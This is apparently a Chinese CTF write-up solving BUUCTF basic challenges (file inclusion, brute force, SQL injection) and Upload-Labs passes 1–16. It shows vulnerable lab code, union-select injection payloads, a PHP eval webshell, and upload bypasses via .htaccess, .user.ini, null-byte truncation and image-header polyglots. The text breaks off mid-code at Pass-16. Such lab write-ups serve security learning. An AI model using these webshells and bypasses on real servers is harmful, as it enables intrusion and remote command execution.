BUUCTF Basic WriteUp
BUU LFI COURSE 1
看到 php 代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
阅读代码,发现可以 get 方法传参 file=/flag,拿到 flag:flag{97452034-df28-4d12-b052-de74f0e1e7c0}。
BUU BRUTE 1
1
2
3
4
5
<form method="get">
<p>Username: <input type="text" name="username" /></p>
<p>Password: <input type="password" name="password" /></p>
<input type="submit" value="Submit" />
</form>
试了几个常见的 username,发现填 admin 提示密码错误,为四位数字。
考虑暴力破解:
1
2
3
4
5
6
7
8
9
10
import requests
url = "http://0ce8ea49-e387-4fae-bc71-affb67b1d123.node5.buuoj.cn:81/?username=admin&password="
for i in range(1000, 100000):
res = requests.get(url + str(i))
print(i, res.text)
if res.text != "密码错误,为四位数字。" :
print(res.text)
break
# 6490 登录成功。flag{db41099c-5c20-4401-81f3-17a06d66b6e8}
密码为 6490,flag 为 flag{db41099c-5c20-4401-81f3-17a06d66b6e8}。
BUU SQL COURSE 1
先找注入点,点击测试新闻 1,发现如下请求:
http://c40fdb45-77a2-4897-a68f-9460b4363ab3.node5.buuoj.cn:81/backend/content_detail.php?id=1
发现有传参,尝试注入。输入 /id?1 and 1=1,返回:
1
2
3
4
{
"title": "测试新闻1",
"content": "哈哈哈哈"
}
页面正常回显信息,说明有 sql 注入点。
先判一下数据库列数,例如:
1
2
3
?id=1 order by 1
?id=1 order by 1,2
?id=1 order by 1,2,3
发现试到 3 就不返回数据了,说明数据库一共有 2 列。
然后查表,使用 payload:?id=-1 union select 1,database(),返回信息:
1
2
3
4
{
"title": "1",
"content": "news"
}
说明数据库名字叫 news,继续查看表名:
1
2
3
4
5
6
7
?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news'
response:
{
"title": "1",
"content": "admin,contents"
}
说明有 admin 和 contents 两个表,我们需要查 admin 表的信息。
继续查 admin 表的字段名:
1
2
3
4
5
6
7
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'
response:
{
"title": "1",
"content": "id,username,password"
}
我们需要 username 和 password 这两个字段:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
?id=-1 union select 1,group_concat(username) from admin
response:
{
"title": "1",
"content": "admin"
}
?id=-1 union select 1,group_concat(password) from admin
response:
{
"title": "1",
"content": "5b2a3161066e5de3fcebd287130d3e57"
}
拿到账号密码分别为 admin 和 5b2a3161066e5de3fcebd287130d3e57,我们尝试登录,拿到 flag:flag{45b7bcda-a8d2-4a20-80c0-a90417235497}。
Upload-Labs-Linux
Pass-01(前端检测后缀名)
题目:
上传一个webshell到服务器。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
第一关是在前端用 js 限制了上传文件后缀,后端并没有做强校验,我们在浏览器禁用 javascript 即可绕过。
例如:(webshell.php)
1
<?php @eval($_POST['cmd']);?>
上传后发现路径是 /upload/webshell.php 直接用蚁剑连接,密码就是 cmd。
访问服务器即可在 /flag 目录拿到 flag:flag{32ec95ba-3139-47d8-a1ac-72c2d0da6ddc}。
还有一个方法是抓包上传文件的请求,绕过前端检查伪造请求直接上传文件,也能实现一样的效果。
1
2
3
4
5
6
7
post /Pass-01/index.php
form-data:
{
upload_file: <your file>,
submit: '上传'
}
Pass-02(后端检测 MIME 类型)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
这一关在后端校验了上传文件的 MIME 类型,我们可以使用抓包工具,拦截上传请求,修改 multipart/form-data 中上传部分的 Content-Type 值后再放包。
这里我用的是 fiddler 工具,在请求前添加断点,更改后放包,上传成功后使用蚁剑连接,拿到 flag(与 Pass-01 相同)。
Pass-03(后端后缀名黑名单检测)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
这一关在后端限制上传 .asp|.aspx|.php|.jsp 后缀文件。还是一样的方法,抓包把文件名从 webshell.php 改为 webshell.php3 即可。
Pass-04(后端后缀名黑名单检测-.htaccess 解析绕过)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
这一关增加了黑名单数量,我们可以尝试注入 .htaccess 文件。
(这个文件是 Apache 服务器中的配置文件,优先级较高,作用于当前目录,可覆盖 Apache 的主要配置文件 httpd.conf)
在 .htaccess 文件中写 SetHandler application/x-httpd-php,表示所有文件都当作 php 文件解析。
然后我们上传一个内容为 <?php @eval($_POST['cmd']);?> 的 webshell.txt 即可。在蚁剑中将地址换为 /upload/webshell.txt 即可拿到 flag。
Pass-05(后端后缀名检测-大写绕过)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
发现没有对后缀名的大小写校验,直接改包把 webshell.php 改成 webshell.Php 即可上传。
在蚁剑里写 /upload/<filename> 连接。
还有第二种版本的题目。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(
".php", ".php5", ".php4", ".php3", ".php2",
".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2",
".html", ".htm", ".phtml", ".pht",
".Html", ".Htm", ".pHtml",
".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml",
".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml",
".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer",
".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr",
".sWf", ".swf",
".htaccess"
);
$file_name = trim($_FILES['upload_file']['name']); // 去除首尾空格
$file_name = deldot($file_name); // 删除文件名末尾的点(防御file.php.攻击)
$file_ext = strrchr($file_name, '.'); // 获取文件扩展名(从最后一个点开始)
$file_ext = strtolower($file_ext); // 统一转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext); // 去除NTFS备用数据流
$file_ext = trim($file_ext); // 去除扩展名首尾空格
// 检查文件扩展名是否在黑名单中
if (!in_array($file_ext, $deny_ext)) {
// 获取上传的临时文件路径
$temp_file = $_FILES['upload_file']['tmp_name'];
// 构造目标文件路径(使用原始文件名,存在安全隐患)
$img_path = UPLOAD_PATH.'/'.$file_name;
// 将临时文件移动到目标位置
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true; // 标记上传成功
} else {
$msg = '上传出错!'; // 文件移动失败(可能权限不足或目录不可写)
}
} else {
$msg = '此文件类型不允许上传!'; // 文件类型被禁止
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!'; // 上传目录不存在
}
}
?>
提示信息:上传目录存在 readme.php 文件。
这一关把 .htaccess 给 ban 了,并且没有重写文件名,上传目录存在 php 文件。满足这些条件,我们可以采用 .user.ini 绕过。(和 .htaccess 类似,可覆盖 PHP 的全局配置文件 php.ini)
我们在 .user.ini 文件中写:
1
auto_prepend_file=webshell.png
表示在页面底部的 php 里自动包含 webshell.png 这个文件,然后拦截上传的包,将 webshell.php 改名 webshell.png 上传,用蚁剑连接 /upload/readme.php 即可。
Pass-06(后缀名检测-尾部空格绕过(windows))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
这一题把大小写校验了,但没有校验空格,可以考虑空格绕过。
利用 Windows 系统的文件名特性。在文件名最后增加空格,例如 webshell.php ,上传后在系统上的文件名会将最后的空格去掉,实际上保存的文件就是 webshell.php。
老方法,抓包在文件名后面加空格即可。
但是由于 buuctf 的靶机是 linux,所以实际在系统里存储的还是 webshell.php (带空格),可以换用 windows 靶机尝试。
Linux 系统可以使用
ls -b命令显示文件名中非打印字符(如空格、制表符、换行符等)的反斜杠转义形式。
Pass-07(后端后缀名检测-尾部 . 绕过)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
提示信息:本 pass 禁止上传所有可以解析的后缀!
构造文件名 webshell.php.,这样 $file_ext 实际获取到的是 .,不在黑名单内,文件就上传成功。
最后使用蚁剑 getshell。
Pass-08(后端后缀名检测-尾部 ::$DATA 绕过(windows))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
在 windows 系统中,::$DATA 是 NTFS 文件系统上的特性,用于表示文件的默认数据流。它是文件系统中隐藏的属性,用于存储文件的实际内容。
当文件名后附加 ::$DATA 时,windows 会忽略 ::$DATA,并将其视为文件的默认数据流。
我们可以拦截上传包,将 filename 改成 webshell.php::$DATA(::$DATA 是 windows 的特性,linux 平台无法利用)。
Pass-09(后端后缀名检测-尾部 .空格. 绕过(windwos))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
在 windows 平台下,如果文件名是 webshell.php. ,会被存储为 webshell.php。
本题与 Pass-06 不同的是,Pass-06 是自定义文件名然后与 file_ext 拼接,而本题直接拼接 file_name。由于本题删除掉了末尾的 .,如果想实现 Pass-06 尾部空格的效果,应该写成 webshell.php. .,也就是在末尾再加一个 .。
这样最终获取到的 $file_ext 就是 .,可以绕过黑名单检测。
用蚁剑 /upload/webshell.php. 成功 getshell。
Pass-10(后缀黑名单检测-嵌套双写绕过)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
首先上传文件测试,发现上传的文件变成了 /upload/webshell.,把后缀名过滤掉了,再试一下 jpg 类型,发现没有检测MIME类型。
文件名也没有强制转小写及重命名,我们尝试双写后缀绕过。
发现 webshell.phpphp 还是会被过滤成 webshell.,继续尝试嵌套 webshell.pPHPhp,成功上传,说明并不会递归过滤(str_ireplace 并不会二次过滤)。
最后蚁剑 /upload/webshell.php getshell。
Pass-11(后缀白名单+上传路径GET可控-%00 截断)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
尝试上传文件发现路径是 /Pass-11/index.php?save_path=../upload/,观察代码发现文件路径的拼接参数中 $_GET['save_path'] 是可控的。
考虑如果:save_path 为 ../upload/webshell.php%00,实际 webshell.php 文件名改为 test.png,这样 img_path 实际为:
1
../upload/webshell.php%00/6320251028134901.png
move_uploaded_file 函数移动文件的时候,遇到 %00(空字节)后面就不处理了,所以实际上执行的 img_path 为:
1
../upload/webshell.php
达到了我们的目的。最后用蚁剑 getshell。
Pass-12(后缀白名单+上传路径POST可控-%00 截断)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
这题与上一题区别在于,上传路径放在 POST 的参数里了。做法类似,构造类似 ../upload/webshell.php%00 的路径即可。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
------WebKitFormBoundaryKj0wwXAfyH0Gz9ZB
Content-Disposition: form-data; name="save_path"
../upload/webshell.php%00
------WebKitFormBoundaryKj0wwXAfyH0Gz9ZB
Content-Disposition: form-data; name="upload_file"; filename="test.png"
Content-Type: application/octet-stream
<?php @eval($_POST['cmd']);?>
------WebKitFormBoundaryKj0wwXAfyH0Gz9ZB
Content-Disposition: form-data; name="submit"
上传
------WebKitFormBoundaryKj0wwXAfyH0Gz9ZB--
Pass-13(文件头检测-图片木马+文件包含)
题目:
任务 上传 图片马 到服务器。
注意:
1.保证上传后的图片马中仍然包含完整的 一句话 或 webshell 代码。
2.使用 文件包含漏洞 能运行图片马中的恶意代码。
3.图片马要 .jpg,.png,.gif 三种后缀都上传成功才算过关!
文件包含漏洞:
1
2
3
4
5
6
7
8
9
10
11
12
<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
include $file;
}else{
show_source(__file__);
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
这题要我们上传图片马,我们可以用 16 进制编辑器(如 010 Editor)将木马放在图片文件的末尾。
我们准备一个图片 upd.jpg 和木马 webshell.php。
在对应目录的命令行执行 copy upd.jpg /b + webshell.php /a res.jpg,这里的 /b 是以二进制模式处理,/a 是以 ASCII 模式处理,res.jpg 是生成的新图片的名称。
用 16 进制编辑器打开看到成功将木马写入图片中:
上传 res.jpg 后打开文件包含漏洞页面,阅读代码,发现 GET 有 file 参数就包含这个文件。
这里如果直接访问图片不会执行 php,必须有文件包含漏洞。
我们打开 /include.php?file=upload/3120251029182400.jpg 页面可以看到成功加载了 jpg 图片,用蚁剑链接。
还有一种方法制作图片木马:
了解一下 jpg 文件。
jpg 文件以 SOI 标记 FF D8 开头,以 EOI 标记 FF D9 结尾,文件头后面跟一个 APP 段,常见的有 FF E0 和 FF E1。后续就是文件的其他元数据和图像数据。
jpg 文件幻数就是用文件开头的一段字节来识别文件类型。
我们可以将 php 木马文件加上 jpg 文件的幻数来骗过类型检测。
例如,使用幻数:
1
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 00 01 00 00
将 webshell.php 改名为 webshell.jpg,然后用十六进制编辑器(010 Editor)打开,加上 jpg 文件的幻数。
在开头插入一段 16 进制的字节。
改成 jpg 文件的文件头并保存。
最后访问上传的 webshell.jpg 图片,利用文件包含漏洞 getshell 即可。
同理,png 和 gif 图片也可以做类似的图片马。
- png:
89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 - gif:
47 49 46 38 39 61 F1 00 2C 01 F7 00 00 64 32 33
审计代码看到只检查了前两个字节,所以 jpg 文件头可以只写 FF D8。
Pass-14(getimagesize 文件类型检测-图片木马+文件包含)
题目和上一关一样。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
提示:本 pass 使用 getimagesize() 检查是否为图片文件!
首先了解一下 php 中的 getimagesize 函数。
getimagesize 会读取文件的前几个字节,并与已知的文件头进行匹配,来判断文件是否为有效的图像文件。
常见的图像文件头:
- JPG 文件:文件头通常是
FF D8 FF。 - PNG 文件:文件头是
89 50 4E 47 0D 0A 1A 0A。 - GIF 文件:文件头是
47 49 46 38 39 61或47 49 46 38 37 61。
getimagesize 会返回图像宽度、图像高度、图像类型(如 IMG_JPG、IMG_PNG 等)、文本字符串(包含宽度和高度的 HTML width 和 height 属性)以及图像的 MIME 类型。
查看代码,仅检查了图像的类型信息($info[2]),我们可以尝试将木马插入图片尾部。(方法与 Pass-13 类似,jpg/png/gif 均可)
还有一种方法。
GIF89a 中文名称“图形交换格式编号89A”,一个 GIF89a 图形文件就是一个根据图形交换格式(GIF)89a 版进行格式化之后的图形。
我们可以在文件起始位置加上 GIF89a,这样文件就会被 getimagesize 认为是一个 gif 图像文件。
我们修改一下 Content-Type 并在文件开头加上 GIF89a。
放包,发现文件成功上传。
Pass-15(exif_imagetype 文件类型检测-图片木马+文件包含)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
function isImage($filename){
//需要开启php_exif模块
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
这一关换成 exif_imagetype 方法了,这个函数的原理是读取图像文件的第一个字节并检查其签名(幻数)来确定文件类型。
原理差不多,都是检查文件头,上一关的方法也适用于本关。
Pass-16(二次渲染绕过-gif/png/jpg)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
